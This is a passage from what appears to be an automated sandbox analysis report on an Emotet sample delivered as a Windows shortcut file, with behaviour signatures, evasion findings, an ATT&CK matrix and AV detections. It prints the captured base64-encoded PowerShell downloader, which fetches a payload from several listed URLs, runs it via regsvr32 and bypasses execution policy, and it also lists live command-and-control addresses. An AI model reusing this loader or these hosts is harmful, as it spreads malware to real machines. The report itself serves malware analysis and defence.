                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep count: 5295 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6728Thread sleep count: 36 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6728Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep count: 4176 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7008Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 5872Thread sleep time: -90000s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-20226
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6912Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2680Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5295Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4176Jump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeAPI coverage: 4.3 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE8CAC FindFirstFileW,FindNextFileW,FindClose,8_2_02CE8CAC
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_6-20228
                  Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: powershell.exe, 00000000.00000003.254657471.000002C31EC14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_p
                  Source: regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]>
                  Source: svchost.exe, 00000011.00000002.519206225.000001ED94265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW
                  Source: svchost.exe, 00000007.00000002.518135512.000002BE42602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                  Source: regsvr32.exe, 00000008.00000002.518396758.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.518462129.000001ED92C29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.519195636.000001ED94258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.446199582.00000278A3CEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 00000014.00000002.446178458.00000278A3CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+
                  Source: svchost.exe, 00000014.00000002.446035375.00000278A3C83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000002.00000002.304754429.000002A12F310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.518257058.000002BE4263E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.518311662.0000012062E2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FBE0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018001FBE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F00C GetModuleHandleA,LoadLibraryA,GetProcAddress,6_2_000000018000F00C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800260BC RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800260BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FBE0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018001FBE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021708 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000180021708

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 138.201.142.73 8080Jump to behavior
                  Bypasses PowerShell execution policy
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtqJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetModuleHandleA,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleHandleA,EnumResourceLanguagesA,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameA,GetLocaleInfoA,_errno,_errno,_snwprintf_s,_errno,_errno,_errno,LoadLibraryA,6_2_0000000180017974
                  Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,6_2_000000018002B35C
                  Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002596C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_000000018002596C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BE00 GetVersionExA,6_2_000000018000BE00

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Changes security center settings (notifications, updates, antivirus, firewall)
                  Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                  Source: svchost.exe, 0000000D.00000002.518221272.00000261ADA13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.518385359.00000261ADB02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Emotet
                  Source: Yara matchFile source: 8.2.regsvr32.exe.2c90000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.regsvr32.exe.2c90000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.regsvr32.exe.1380000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.regsvr32.exe.1380000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.296664424.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.518667146.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  Input Capture                  		1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium12
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Native API                  		Boot or Logon Initialization Scripts111
                  Process Injection                  		1
                  Obfuscated Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop Protocol1
                  Input Capture                  		Exfiltration Over Bluetooth1
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts1
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading                  		Security Account Manager35
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                  Non-Standard Port                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local Accounts3
                  PowerShell                  		Logon Script (Mac)Logon Script (Mac)31
                  Masquerading                  		NTDS1
                  Query Registry                  		Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Non-Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script31
                  Virtualization/Sandbox Evasion                  		LSA Secrets41
                  Security Software Discovery                  		SSHKeyloggingData Transfer Size Limits122
                  Application Layer Protocol                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common111
                  Process Injection                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Hidden Files and Directories                  		DCSync12
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem11
                  Application Window Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                  Remote System Discovery                  		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 615497 Sample: 2022-04-26_1045.exe.lnk Startdate: 26/04/2022 Architecture: WINDOWS Score: 100 44 129.232.188.93 xneeloZA South Africa 2->44 46 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->46 48 60 other IPs or domains 2->48 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 62 15 other signatures 2->62 9 powershell.exe 22 2->9         started        13 svchost.exe 2->13         started        15 svchost.exe 1 1 2->15         started        18 9 other processes 2->18 signatures3 process4 dnsIp5 40 C:\Users\user\AppData\...\ezMgZunnfF.ps1, Little-endian 9->40 dropped 66 Windows shortcut file (LNK) starts blacklisted processes 9->66 68 Powershell drops PE file 9->68 20 powershell.exe 14 17 9->20         started        24 conhost.exe 1 9->24         started        70 Changes security center settings (notifications, updates, antivirus, firewall) 13->70 26 MpCmdRun.exe 13->26         started        54 127.0.0.1 unknown unknown 15->54 file6 signatures7 process8 dnsIp9 52 focusmedica.in 166.62.28.147, 49747, 80 AS-26496-GO-DADDY-COM-LLCUS United States 20->52 38 C:\Users\user\AppData\...behaviorgraphMOWDTRfIJ.xtq, PE32+ 20->38 dropped 28 regsvr32.exe 5 20->28         started        32 conhost.exe 26->32         started        file10 process11 file12 42 C:\Windows\System32\...\enxldhj.oxc (copy), PE32+ 28->42 dropped 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->72 34 regsvr32.exe 28->34         started        signatures13 process14 dnsIp15 50 138.201.142.73, 49756, 8080 HETZNER-ASDE Germany 34->50 64 System process connects to network (likely due to code injection or exploit) 34->64 signatures16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  2022-04-26_1045.exe.lnk32%VirustotalBrowse
                  2022-04-26_1045.exe.lnk100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\GMOWDTRfIJ.xtq100%Joe Sandbox ML

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  8.2.regsvr32.exe.2c90000.0.unpack100%AviraHEUR/AGEN.1215493Download File
